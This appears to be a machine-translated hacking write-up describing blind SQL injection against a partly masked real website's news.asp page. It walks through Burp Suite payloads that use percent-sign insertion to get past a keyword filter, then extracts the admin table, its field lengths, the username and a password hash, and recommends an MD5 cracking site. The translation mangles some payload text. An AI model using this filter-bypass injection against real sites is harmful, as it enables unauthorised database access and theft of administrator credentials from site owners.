Environment:
Http://www.s ** g.cn/news.asp? Id = 262
IIS + asp + access
Principle:
As mentioned in the Security Quiz of express delivery manufacturers. Asp. when the dll file decodes the url of the Post-asp file parameter string, it will directly filter out 09-0d (09 is the tab key, 0d is the carriage return), 20 (Space) and % (one or more of the following two characters is not in hexadecimal format.
Here we use burp suite to run the program. The bypass statements constructed are as follows:
Guess table
GET/news. asp? Id = 262% 20and % 20 exist % s % 20 (sele % c % t % 20 count (*) % 20 from % 20 § table name §)
Admin table available
Guess Field
GET/news. asp? Id = 262% 20an % d % 20 (sele % c % t % 20 count (§ field name §) % 20 from % 20 admin) % 3E0
User and pass Fields
Guess the length of the user Field
GET/news. asp? Id = 262% 20an % d % 20 (sele % c % t % 20top % 201% 20len (user) % 20 from % 20 admin) = 1
Length: 5
Length of the pass field
GET/news. asp? Id = 262% 20an % d % 20 (sele % c % t % 20top % 201% 20len (pass) % 20 from % 20 admin) = 1
Length: 32
Guess user Content www.2cto.com
GET/news. asp? Id = 262% 20an % d % 20 (sele % c % t % 20top % 201% 20asc (mid (user,) % 20 from % 20 admin) = § 97 §
Admin
Guess pass content
GET/news. asp? Id = 262% 20an % d % 20 (sele % c % t % 20top % 201% 20asc (mid (pass,) % 20 from % 20 admin) = § 97 §
A7b1467f2a5eecb631e2e5ffeafddeb8
From the above, we can see that only a simple SQL Injection statement is added with a bypass method. By the way, we recommend a foreign md5 cracking website, md5decrypter, with a high success rate.